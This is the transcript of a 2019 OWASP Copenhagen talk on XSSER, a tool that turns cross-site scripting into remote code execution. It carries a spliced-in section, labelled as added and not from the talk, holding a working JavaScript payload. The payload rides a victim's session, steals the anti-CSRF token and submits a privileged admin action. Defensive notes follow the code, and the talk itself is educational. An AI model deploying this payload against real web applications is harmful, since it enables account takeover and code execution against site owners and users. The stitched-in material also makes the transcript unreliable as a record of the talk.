XSSER: From XSS to RCE 3.0
Hans-Michael Varbaek
March 28, 2019
OWASP Copenhagen
Transcript
XSSER: From XSS to RCE 3.0
OWASP Copenhagen Chapter, 28 March 2019
About me
➢ ISP Red Team, Copenhagen
➢ Presented at Black Hat Europe, Kiwicon, Hack in the Box, etc.
➢ Full-time security consultant career began in Sydney, Australia
Shodan: port:80
How many web servers globally?
➢ Approximately 85 million (Shodan, port:80)
How many of them run PHP?
➢ Approximately 8.1 million (Shodan, PHP)
However...
What about virtual hosting?
➢ 1.4 billion websites
➢ 232 million unique domains
➢ 27 million websites running WordPress
That's a lot more attack surface for adversaries (Netcraft, March 2019 Web Server Survey)
Classic XSS Attacks
➢ Cookie stealing
  ➢ Prevented by the "HttpOnly" cookie flag (script cannot read the cookie via document.cookie)
➢ Defacements
➢ Phishing
➢ Session hijacking (e.g. BeEF, XSSER, etc.)
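HttpOnly only stops the injected script from reading the cookie; it does not stop the script from using the session. Every same-origin request the payload makes carries the victim's cookie automatically, so the attacker can drive the victim's account (the "session hijacking" bullet above) without ever seeing the cookie, and if the victim is an administrator who is allowed to upload or edit code, that is the step that turns an XSS into code execution. The following is an added example written for this page, not code from the talk or from the XSSER project: a session-riding payload skeleton that fetches a privileged page, extracts its anti-CSRF token, and submits a privileged action with that token. The target paths, the form field name `csrf_token`, the `action` field and the mock server are all hypothetical; in a browser the same function is called with `window.fetch`, here it runs offline against a constructed mock so the flow can be exercised end to end.

```javascript
// Added example (not from the talk or the XSSER project): session-riding XSS payload.
// The injected script runs inside the victim's origin, so fetch() with
// credentials: "same-origin" sends the session cookie for us. HttpOnly is
// irrelevant to this path because we never read the cookie.
//
// Target application, endpoints and field names below are hypothetical.

const ADMIN_FORM_PATH = "/admin/settings";   // hypothetical page that embeds an anti-CSRF token
const ADMIN_ACTION_PATH = "/admin/settings"; // hypothetical endpoint that accepts the form POST

// Pull the anti-CSRF token out of a page the *victim* is allowed to see.
// Returns null when no token is present (e.g. the victim is not an admin).
function extractToken(html) {
  const m = html.match(/name="csrf_token"\s+value="([^"]+)"/);
  return m ? m[1] : null;
}

// Build the x-www-form-urlencoded body for the privileged action.
function buildBody(token, fields) {
  return new URLSearchParams({ csrf_token: token, ...fields }).toString();
}

// Drive the victim's session: GET the form (token), then POST the action.
// `fetchImpl` is injected so the same code runs in a browser (window.fetch)
// or under the offline mock below. Same-origin credentials ride along on both.
async function rideSession(fetchImpl, fields) {
  const page = await fetchImpl(ADMIN_FORM_PATH, { credentials: "same-origin" });
  const token = extractToken(await page.text());
  if (!token) {
    return { ok: false, reason: "no csrf token found: victim is probably not privileged" };
  }
  const resp = await fetchImpl(ADMIN_ACTION_PATH, {
    method: "POST",
    credentials: "same-origin",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: buildBody(token, fields),
  });
  return { ok: resp.status === 200, token, status: resp.status };
}

// --- Constructed mock of the target so the flow can be exercised offline ---
// Mimics a server that issues a per-session token on the form page, accepts
// the POST only when that token is echoed back, and (as HttpOnly would) never
// exposes the cookie to script. `tokenIssued: false` models a victim who is
// logged in but not privileged enough to see the form.
function makeMockServer({ tokenIssued = true } = {}) {
  const issuedToken = "t0k3n-issued-to-victim";
  const received = [];                                 // POST bodies the "server" accepted or refused
  const fetchImpl = async (path, opts = {}) => {
    if (path === ADMIN_FORM_PATH && !opts.method) {
      const html = tokenIssued
        ? `<form><input type="hidden" name="csrf_token" value="${issuedToken}"></form>`
        : `<p>Access denied</p>`;
      return { status: 200, text: async () => html };
    }
    if (path === ADMIN_ACTION_PATH && opts.method === "POST") {
      const body = new URLSearchParams(opts.body);
      received.push(Object.fromEntries(body));
      const accepted = body.get("csrf_token") === issuedToken;
      return { status: accepted ? 200 : 403, text: async () => "" };
    }
    return { status: 404, text: async () => "" };
  };
  return { fetchImpl, received, issuedToken };
}

// Stand-alone demonstration against the mock. In a real payload this would be
// rideSession(window.fetch.bind(window), { action: "install" }).
rideSession(makeMockServer().fetchImpl, { action: "install" })
  .then((r) => console.log("admin victim:", r))
  .then(() => rideSession(makeMockServer({ tokenIssued: false }).fetchImpl, { action: "install" }))
  .then((r) => console.log("unprivileged victim:", r));
```

The defensive takeaway is the mirror image: HttpOnly is still worth setting, but it addresses only the cookie-theft bullet. Whether an XSS becomes account takeover or code execution is decided by what the victim's session is allowed to do, so the privileged actions (plugin or theme upload, file editors, user creation) are where re-authentication, separate admin origins and a Content Security Policy that blocks inline script pay off.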
XSSER
XSSER: What and why?
➢ Can automate XSS attacks to obtain RCE
➢ Meant for educational purposes
➢ Fully open source and available on GitHub
Demo
References
https://github.com/Varbaek/xsser
https://shodan.io
https://news.netcraft.com/archives/category/web-server-survey/
Questions?